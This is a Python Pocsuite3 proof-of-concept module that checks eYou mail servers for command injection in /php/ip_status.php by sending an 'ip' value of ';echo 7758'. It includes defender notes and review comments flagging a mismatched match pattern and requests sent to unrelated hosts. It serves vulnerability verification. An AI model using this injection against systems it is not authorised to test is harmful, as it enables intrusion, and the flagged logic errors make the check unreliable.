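"""Pocsuite3 check for command execution in eYou /php/ip_status.php.

The check sends a GET request for ``/php/ip_status.php`` with an ``ip``
query value that starts with ``;`` and then searches the response body
for a fixed pattern (see ``DemoPOC.match_patter``).

Notes for defenders:
* Where query strings are logged, a request of this shape appears in web
  access logs as a GET for ``/php/ip_status.php`` whose ``ip`` value
  contains ``;``.
* The server-side code is not shown here; presumably the ``ip`` value
  reaches a shell command, so it should be validated as an IP address
  before use -- confirm against the application source.

If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from requests.exceptions import ReadTimeout, RequestException
from urllib.parse import urlparse
import re


class DemoPOC(POCBase):
    """Verification check for the eYou ip_status.php command execution issue."""

    vulID = '0926'  # ssvid
    version = '1'
    author = ['chenghs@knownsec.com']
    vulDate = '2013-04-15'
    createDate = '2013-04-15'
    updateDate = '2013-04-15'
    references = ['']
    name = 'eYou /php/ip_status.php 命令执行漏洞'
    appPowerLink = 'http://www.eyou.com/'
    appName = 'eYou'
    appVersion = '#'
    vulType = 'Command execution'
    desc = ''' eYou 文件/php/ip_status.php命令执行 '''
    samples = []
    install_requires = ['']

    def match_patter(self, page_content, pattern=r'sbin/pinfo 127.0.0.1 view'):
        """Return every match of *pattern* in *page_content*.

        The search is case-insensitive, multi-line and lets ``.`` match
        newlines. The result is the list from ``re.findall``; an empty
        list means no match.
        """
        # NOTE(review): the dots in the default pattern are regex wildcards,
        # not literal dots, so the match is looser than the text suggests.
        # NOTE(review): the request echoes 7758 but this pattern looks for a
        # different string -- confirm what a vulnerable response contains.
        return re.findall(pattern, page_content, re.I | re.M | re.DOTALL)

    def _verify(self):
        """Request the check URL on each candidate host/port and report a hit.

        Candidate hosts are derived from ``self.url``: an IP address (or a
        host name without a dot) is used as given; otherwise the first label
        of the host name is replaced by ``www`` and ``mail``. Each candidate
        is tried on ports 80 and 8080 over plain HTTP. The first response
        that matches ``match_patter`` ends the check.

        Returns:
            The ``Output`` built by ``parse_output``; it carries
            ``VerifyInfo['URL']`` when a response matched.
        """
        result = {}
        payload = '/php/ip_status.php?ip=;echo%207758'
        ports = ['80', '8080']

        # urlparse only fills in the host when a scheme is present.
        target = self.url if '://' in self.url else 'http://' + self.url
        # .hostname drops scheme, port and path in one step. The previous
        # str.lstrip('http://') removed a *character set*, not a prefix,
        # and mangled https:// URLs.
        host = urlparse(target).hostname or ''
        if not host:
            return self.parse_output(result)

        labels = host.split('.')
        if labels[-1].isdigit() or len(labels) == 1:
            # An IP address or a single-label host has no subdomain to replace.
            hosts = [host]
        else:
            # NOTE(review): requests go to the www./mail. siblings, not to the
            # host that was passed in. For a two-label host such as
            # "example.com" this yields "www.com" / "mail.com", i.e. an
            # unrelated host -- confirm this is intended.
            suffix = host[host.index('.'):]
            hosts = [prefix + suffix for prefix in ('www', 'mail')]

        for candidate in hosts:
            for port in ports:
                url = 'http://' + candidate + ':' + port + payload
                try:
                    body = requests.get(url).text
                except RequestException as exc:
                    # One unreachable host/port must not abort the whole check.
                    logger.debug('request to %s failed: %s', url, exc)
                    continue
                if body and self.match_patter(body):
                    result['VerifyInfo'] = {'URL': url}
                    # Stop at the first confirmation; the old `break` left only
                    # the inner loop and kept sending requests afterwards.
                    return self.parse_output(result)

        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap *result* in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        """Run the same check as ``_verify``; no further action is taken."""
        return self._verify()


register_poc(DemoPOC)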
暂无官方解决方案
暂无防护方案
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负